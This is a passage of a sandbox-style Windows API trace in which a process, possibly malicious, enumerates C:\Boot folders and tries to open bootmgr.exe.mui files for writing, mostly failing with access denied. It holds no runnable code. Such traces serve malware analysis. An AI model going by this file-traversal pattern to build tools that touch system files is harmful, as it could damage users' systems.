dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.958] GetLastError () returned 0x5 [0082.958] GetLastError () returned 0x5 [0082.958] SetLastError (dwErrCode=0x5) [0082.958] GetLastError () returned 0x5 [0082.958] SetLastError (dwErrCode=0x5) [0082.958] GetLastError () returned 0x5 [0082.958] SetLastError (dwErrCode=0x5) [0082.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.958] AreFileApisANSI () returned 1 [0082.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\et-EE") returned 14 [0082.958] CreateFileW (lpFileName="C:\\Boot\\et-EE" (normalized: "c:\\boot\\et-ee"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.958] GetLastError () returned 0x5 [0082.958] GetLastError () returned 0x5 [0082.958] SetLastError (dwErrCode=0x5) [0082.958] GetLastError () returned 0x5 [0082.958] SetLastError (dwErrCode=0x5) [0082.958] GetLastError () returned 0x5 [0082.958] SetLastError (dwErrCode=0x5) [0082.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.959] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.959] FindFirstFileExW (in: lpFileName="C:\\Boot\\et-EE\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78010 [0082.959] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.959] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.960] AreFileApisANSI () returned 1 [0082.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\et-EE\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\et-EE\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.961] AreFileApisANSI () returned 1 [0082.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 30 [0083.118] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.118] GetFileType (hFile=0x42c) returned 0x1 [0083.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.119] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.119] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.119] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.119] CloseHandle (hObject=0x42c) returned 1 [0083.119] AreFileApisANSI () returned 1 [0083.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\et-EE\\bootmgr.exe.mui") returned 30 [0083.119] CreateFileW (lpFileName="C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.119] GetLastError () returned 0x5 [0083.119] GetLastError () returned 0x5 [0083.120] SetLastError (dwErrCode=0x5) [0083.120] GetLastError () returned 0x5 [0083.120] SetLastError (dwErrCode=0x5) [0083.120] GetLastError () returned 0x5 [0083.120] SetLastError (dwErrCode=0x5) [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.120] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69178, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧╠\x01⺊Ā")) returned 0 [0083.120] FindClose (in: hFindFile=0x78010 | out: hFindFile=0x78010) returned 1 [0083.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0083.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.121] AreFileApisANSI () returned 1 [0083.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fi-FI", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fi-FI", lpUsedDefaultChar=0x0) returned 14 [0083.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.121] AreFileApisANSI () returned 1 [0083.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0083.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fi-FI") returned 14 [0083.121] CreateFileW (lpFileName="C:\\Boot\\fi-FI" (normalized: "c:\\boot\\fi-fi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.121] GetLastError () returned 0x5 [0083.121] GetLastError () returned 0x5 [0083.121] SetLastError (dwErrCode=0x5) [0083.121] GetLastError () returned 0x5 [0083.121] SetLastError (dwErrCode=0x5) [0083.121] GetLastError () returned 0x5 [0083.122] SetLastError (dwErrCode=0x5) [0083.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.122] AreFileApisANSI () returned 1 [0083.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0083.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fi-FI") returned 14 [0083.122] CreateFileW (lpFileName="C:\\Boot\\fi-FI" (normalized: "c:\\boot\\fi-fi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.122] GetLastError () returned 0x5 [0083.122] GetLastError () returned 0x5 [0083.122] SetLastError (dwErrCode=0x5) [0083.122] GetLastError () returned 0x5 [0083.122] SetLastError (dwErrCode=0x5) [0083.122] GetLastError () returned 0x5 [0083.122] SetLastError (dwErrCode=0x5) [0083.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.122] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.122] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0083.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.123] FindFirstFileExW (in: lpFileName="C:\\Boot\\fi-FI\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78750 [0083.123] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.123] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 